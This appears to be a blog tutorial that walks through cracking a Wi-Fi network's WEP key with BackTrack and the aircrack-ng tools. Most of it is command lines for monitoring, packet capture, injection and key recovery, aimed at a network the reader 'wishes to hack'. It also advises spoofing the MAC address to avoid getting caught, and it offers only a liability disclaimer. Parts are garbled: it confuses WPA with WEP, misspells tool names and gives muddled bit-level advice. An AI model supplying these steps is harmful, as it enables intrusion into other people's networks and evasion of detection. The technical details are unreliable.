Wifi or Wireless Fidelity is the name of a popular wireless networking
technology that uses radio waves to provide wireless high-speed
Internet and network connections. Wifi has become an integral part of
our lives today.
Right from Mobile Phones to Laptops to Ipads every device now has Wifi support.
Right from Mobile Phones to Laptops to Ipads every device now has Wifi support.
Wifi is secured using a WPA protocol which intends to secure Wireless
LANs like Wired LAN’s by encrypting data over radio waves, however, it
has been found that WEP is not as secure as once believed. Now almost
anyone can hack into a Wifi network by generating the valid WEP key
using Bactrack. Read on to learn how ..
Disclaimer: This tutorial is given for educational purposes only and that for any misuse of this information, the blogger cannot be held liable.
SETTING UP THE CARD AND THE CONSOLE
Boot up Backtrack on your virtual machine/laptop and open up the command console and type the commands as they are given -
* ifconfig
This is the Linux equivalent of ipconfig, you will see the network
adapters in your system. See which one is for Wi-Fi. A few examples are
wlan0, wifi0, etc.
* airmon-ng
This command will initialize the Wi-Fi network monitoring & will tell you how many networks are in range
* airmon-ng stop [Wi-Fi Card name(without the quotes)]
This command will stop the cards broadcast and reception immediately
* macchanger –mac [Desired MAC address] [Wi-Fi card name]
This command will change the current MAC address to any MAC address you desire, so that you don’t get caught later
* airmon-ng start [Wi-Fi Card name]
You will see another extra adapter that is set on monitor mode, use
that adapter for all further purposes in the following commands where –
‘[Wi-Fi card name]’ appears
DUMPING PACKETS
Once you have set up all the parameters,you need to sniff and dump data
packets in order to get the key.You can do so by using following
commands. On the command console type these commands -
* airodump-ng [Wi-Fi card name]
Copy and paste the BSSID in the following command and execute it
* airodump-ng –c [Channel Number] –w [Desired Filename for later decryption] --bssid [BSSID] [Wi-Fi Card name]
As you execute the command, you will see a certain number of beacons
and data packets that will be stored in the filename you have given.
The file will be stored in the root of the system drive (Click on
Computer and you will see the file).The file will be present in two
formats: *.cap, *.txt.
SPEEDING UP THINGS
However packet dumping is quite a slow process,we need to speed up
things to save our time.Open a new console after the first data packet
has been stored and type the command in the new console and execute it
*airreplay-ng -1 0 –a [BSSID] –h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)] [Wi-Fi card name]
As you type this command you will see that the data packets required
for breaking the key will increase dramatically thereby saving you a
lot of time.
REVEALING WEP KEY
Open another console once you have around 20,000 data packets and type the following command to reveal the WEP key.
aircrack-ng –n 64 –b [BSSID] [Filename without the extension] Revealing the WEP Key -
As you type this command, you will see that a key will appear in front of you in the given below format:
XX:XX:XX:XX
It is not necessary that the key should have exactly the same digits as
shown above so please don’t freak out if you see a 10 digit or 14
digit key. Also if the decryption fails, you can change the bit level
of the decryption in the command:
aircrack-ng –n [BIT LEVEL] –b [BSSID] [Filename without extension]
Remember, the bit level should be a number of 2n where n:1,2,3,4…
e.g.
aircrack-ng –n 32 –b [BSSID] [Filename without the extension]
OR
aircrack-ng –n 128 –b [BSSID] [Filename without the extension] etc. etc.
